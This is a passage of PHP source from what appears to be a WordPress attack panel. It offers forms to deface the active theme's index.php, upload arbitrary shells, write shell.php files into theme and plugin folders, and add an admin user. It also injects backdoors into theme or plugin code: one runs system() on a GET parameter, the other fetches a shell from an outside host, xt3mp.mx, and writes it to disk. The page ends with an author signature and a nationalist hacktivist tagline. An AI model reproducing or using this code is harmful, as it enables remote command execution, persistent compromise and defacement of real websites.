$showForm = false;
echo '<div
class="success">Index updated correctly</div>';
echo '<META HTTP-
EQUIV="refresh" CONTENT="2; url=?">';
endif;
endif;
if($showForm):
?>
<div id="info" style="margin-
bottom: 5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl');
?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo
($_SESSION['dbPref'], 'template'); ?></a><br /></div>
<div id="info">Insert New Index
Content (WP Actual Theme Index) [cURL]:</div>
<div id="data">
<div
class="clear"><label>User:</label><input type="text" id="new_user" name="admin_user" value="Admin2" /><
Insert Admin User<br /></div>
<div
class="clear"><label>Pass:</label><input type="text" id="new_pass" name="admin_pass" value="new_pass"
/>< Insert Admin Password<br /></div>
<div
class="clear"><label>Content:</label><textarea name="new_content" style="text-align: left;font-
size:13px;font-family:'Courier New', Courier, monospace" rows="5"></textarea><br /></div>
<div
class="clear"><label></label><input type="submit" name="change_index" value="Change Index" /></div>
</div>
<?php
endif;
?>
<?php
break;
case 6:
$showForm = true;
$theme = getInfo($_SESSION['dbPref'],
'template');
if(isset($_POST['change_index'])):
$wpCont = stripslashes($_POST
['new_content']);
$themeContent = @fopen('./wp-
content/themes/'.$theme.'/index.php', 'w+');
if(!$themeContent):
echo '<div
class="error">Can\'t open/found index.php file</div>';
else:
@fwrite($themeContent,
$wpCont);
@fclose($themeContent);
$showForm = false;
echo '<div
class="success">Index updated correctly</div>';
echo '<META HTTP-
EQUIV="refresh" CONTENT="2; url=?">';
endif;
endif;
if($showForm):
$themeContent =
@file_get_contents('./wp-content/themes/'.$theme.'/index.php');
?>
<div id="info" style="margin-
bottom: 5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl');
?>/wp-content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo
($_SESSION['dbPref'], 'template'); ?></a><br /></div>
<div id="info">Insert New Index
Content (WP Actual Theme Index) [fopen]:</div>
<div id="data">
<div
class="clear"><label>Content:</label><textarea name="new_content" style="text-align: left;font-
size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $themeContent; ?
></textarea><br /></div>
<div
class="clear"><label></label><input type="submit" name="change_index" value="Change Index" /></div>
</div>
<?php
endif;
break;
case 7:
$showForm = true;
if(isset($_POST['upload_shell'])):
$uploadShell = basename($_FILES
['file']['name']);
if(!move_uploaded_file($_FILES
['file']['tmp_name'], $uploadShell)):
echo '<div
class="error">Can\'t Upload Shell</div>';
else:
$showForm = false;
echo '<div
class="success">Shell Uploaded Correctly: <a href="'.getInfo($_SESSION['dbPref'], 'siteurl').'/'.
$uploadShell.'" target="_blank">'.$uploadShell.'</a></div>';
endif;
endif;
if($showForm):
?>
<div id="info">Upload Shell To This
Path:</div>
<div id="data">
<div
class="clear"><label>File:</label><input type="file" name="file" style="border: 1px dashed #00CF00;"/>
<input type="submit"
name="upload_shell" value="Upload Shell" style="margin-left: -15px;"/></div>
</div>
<?php
endif;
break;
case 8:
$showForm = true;
if(isset($_POST['make_shell'])):
$shellTheme = $_POST
['shell_theme'];
$shellName = $_POST
['shell_name'];
$shellCont = stripslashes
($_POST['shell_content']);
$makeShell = @fopen('./wp-
content/themes/'.$shellTheme.'/'.$shellName, 'w+');
if(!$makeShell):
echo '<div
class="error">Can\'t Make Shell In '.$shellTheme.'</div>';
else:
$showForm = false;
@fwrite($makeShell,
$shellCont);
@fclose($makeShell);
echo '<div
class="success">Shell Maked Correctly: <a href="'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-
content/themes/'.$shellTheme.'/'.$shellName.'" target="_blank">'.$shellName.'</a></div>';
endif;
endif;
if($showForm):
?>
<div id="info" style="margin-bottom:
5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-
content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION
['dbPref'], 'template'); ?></a><br /></div>
<div id="info">Make Shell To Themes Path
[fopen]:</div>
<div id="data">
<div
class="clear"><label>Theme:</label><select name="shell_theme"><?php echo getThemes(); ?></select><
Select Theme<br /></div>
<div
class="clear"><label>Name:</label><input type="text" id="shell_name" name="shell_name" value="shell.php"
/>< Insert Shell Name<br /></div>
<div
class="clear"><label>Content:</label><textarea name="shell_content" style="text-align: left;font-
size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $themeContent; ?
></textarea><br /></div>
<div
class="clear"><label></label><input type="submit" name="make_shell" value="Make Shell" /></div>
</div>
<?php
endif;
break;
case 9:
$showForm = true;
if(isset($_POST['make_shell'])):
$shellPlugin = $_POST
['shell_plugin'];
$shellName = $_POST
['shell_name'];
$shellCont = stripslashes
($_POST['shell_content']);
$makeShell = @fopen('./wp-
content/plugins/'.$shellPlugin.'/'.$shellName, 'w+');
if(!$makeShell):
echo '<div
class="error">Can\'t Make Shell In '.$shellPlugin.'</div>';
else:
$showForm = false;
@fwrite($makeShell,
$shellCont);
@fclose($makeShell);
echo '<div
class="success">Shell Maked Correctly: <a href="'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-
content/plugins/'.$shellPlugin.'/'.$shellName.'" target="_blank">'.$shellName.'</a></div>';
endif;
endif;
if($showForm):
?>
<div id="info" style="margin-bottom:
5px;">Active Plugins (this can be different to Plugins Path):<br /> <?php echo getInstalledPlugins
(getInfo($_SESSION['dbPref'], 'siteurl'), getInfo($_SESSION['dbPref'], 'active_plugins')); ?><br
/></div>
<div id="info">Make Shell To Plugins
Path [fopen]:</div>
<div id="data">
<div
class="clear"><label>Plugin:</label><select name="shell_plugin"><?php echo getPlugins(); ?></select><
Select Plugin<br /></div>
<div
class="clear"><label>Name:</label><input type="text" id="shell_name" name="shell_name" value="shell.php"
/>< Insert Shell Name<br /></div>
<div
class="clear"><label>Content:</label><textarea name="shell_content" style="text-align: left;font-
size:13px;font-family:'Courier New', Courier, monospace" rows="5"><?php echo $themeContent; ?
></textarea><br /></div>
<div
class="clear"><label></label><input type="submit" name="make_shell" value="Make Shell" /></div>
</div>
<?php
endif;
break;
case 10:
$showForm = true;
if(isset($_POST['make_backdoor'])):
$backdoorTheme = $_POST
['backdoor_theme'];
$backdoorType = $_POST
['backdoor_type'];
$realTheme = @file_get_contents
('./wp-content/themes/'.$backdoorTheme.'/index.php');
if(strstr($realTheme, '<?php')):
$exp = '<?php';
elseif(strstr($realTheme,
'<?')):
$exp = '<?';
endif;
if($backdoorType == '1'):
$extra = '?
active=true&cmd=COMMAND';
$backdoorCont = 'if(!
empty($_GET[\'active\'])){system($_GET[\'cmd\']);exit();}';
else:
$extra = '?
active=true&filename=SHELL.PHP&externalfile=http://xt3mp.mx/shell.txt';
$backdoorCont = 'if(!
empty($_GET[\'active\'])){$fileContent = @file_get_contents($_GET[\'externalfile\']);$file = fopen
($_GET[\'filename\'], \'w+\');@fwrite($file, $fileContent);@fclose($file);echo \'<a href="\'.$_GET
[\'filename\'].\'">\'.$_GET[\'filename\'].\'</a>\';exit();}';
endif;
$explode = explode($exp,
$realTheme, 2);
$newContent = stripslashes
($exp.' '.$backdoorCont.' '.$explode[1]);
$makeBackdoor = @fopen('./wp-
content/themes/'.$backdoorTheme.'/index.php', 'w+');
if(!$makeBackdoor):
echo '<div
class="error">Can\'t Make Backdoor In /wp-content/themes/'.$backdoorTheme.'/index.php</div>';
else:
$showForm = false;
@fwrite($makeBackdoor,
$newContent);
@fclose($makeBackdoor);
echo '<div
class="success">Backdoor Maked Correctly: <br />'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-
content/themes/'.$backdoorTheme.'/index.php'.$extra.'</div>';
endif;
endif;
if($showForm):
?>
<div id="info" style="margin-bottom:
5px;">Actual Theme: <a target="_blank" href="<?php echo getInfo($_SESSION['dbPref'], 'siteurl'); ?>/wp-
content/themes/<?php echo getInfo($_SESSION['dbPref'], 'template'); ?>"><?php echo getInfo($_SESSION
['dbPref'], 'template'); ?></a><br /></div>
<div id="info">Make Shell To Themes Path
[fopen]:</div>
<div id="data">
<div
class="clear"><label>Theme:</label><select name="backdoor_theme"><?php echo getThemes(); ?></select><
Select Theme<br /></div>
<div
class="clear"><label>Type:</label><select name="backdoor_type"><option value="1">system
();</option><option value="2">File Downloader</option></select>< Select Backdoor Type</div>
<div
class="clear"><label></label><input type="submit" name="make_backdoor" value="Make Backdoor" /></div>
</div>
<?php
endif;
break;
case 11:
$showForm = true;
if(isset($_POST['make_backdoor'])):
$backdoorPlugin = $_POST
['backdoor_plugin'];
$backdoorType = $_POST
['backdoor_type'];
$realPlugin =
@file_get_contents('./wp-content/plugins/'.$backdoorPlugin);
if(strstr($realPlugin, '<?
php')):
$exp = '<?php';
elseif(strstr($realPlugin,
'<?')):
$exp = '<?';
endif;
if($backdoorType == '1'):
$extra = '?
active=true&cmd=COMMAND';
$backdoorCont = 'if(!
empty($_GET[\'active\'])){system($_GET[\'cmd\']);exit();}';
else:
$extra = '?
active=true&filename=SHELL.PHP&externalfile=http://xt3mp.mx/shell.txt';
$backdoorCont = 'if(!
empty($_GET[\'active\'])){$fileContent = @file_get_contents($_GET[\'externalfile\']);$file = fopen
($_GET[\'filename\'], \'w+\');@fwrite($file, $fileContent);@fclose($file);echo \'<a href="\'.$_GET
[\'filename\'].\'">\'.$_GET[\'filename\'].\'</a>\';exit();}';
endif;
$explode = explode($exp,
$realPlugin, 2);
$newContent = $exp.' '.
$backdoorCont.' '.$explode[1];
$makeBackdoor = @fopen('./wp-
content/plugins/'.$backdoorPlugin, 'w+');
if(!$makeBackdoor):
echo '<div
class="error">Can\'t Make Backdoor In /wp-content/plugins/'.$backdoorPlugin.'</div>';
else:
$showForm = false;
@fwrite($makeBackdoor,
$newContent);
@fclose($makeBackdoor);
echo '<div
class="success">Backdoor Maked Correctly: <br />'.getInfo($_SESSION['dbPref'], 'siteurl').'/wp-
content/plugins/'.$backdoorPlugin.$extra.'</div>';
endif;
endif;
if($showForm):
?>
<div id="info">Make Shell To Plugins
Path [fopen]:</div>
<div id="data">
<div
class="clear"><label>Plugin:</label><select name="backdoor_plugin"><?php echo getInstalledPlugins
(getInfo($_SESSION['dbPref'], 'siteurl'), getInfo($_SESSION['dbPref'], 'active_plugins'), true); ?
></select>< Select Plugin (Active Plugins)<br /></div>
<div
class="clear"><label>Type:</label><select name="backdoor_type"><option value="1">system
();</option><option value="2">File Downloader</option></select>< Select Backdoor Type</div>
<div
class="clear"><label></label><input type="submit" name="make_backdoor" value="Make Backdoor" /></div>
</div>
<?php
endif;
break;
default;
echo '<META HTTP-EQUIV="refresh"
CONTENT="0; url=?">';
?>
<?php
endswitch;
?>
</div>
<?php
endif;
?>
</fieldset>
<?php
endif;
?>
</form>
</div>
<pre style="text-align: center;margin-top: 5px">xt3mp@null.net >> http://xt3mp.mx</pre>
</body>
</html>
Bura Ergenekon, təpədən-dırnağa Türkəm!
Anti-armenia.ORG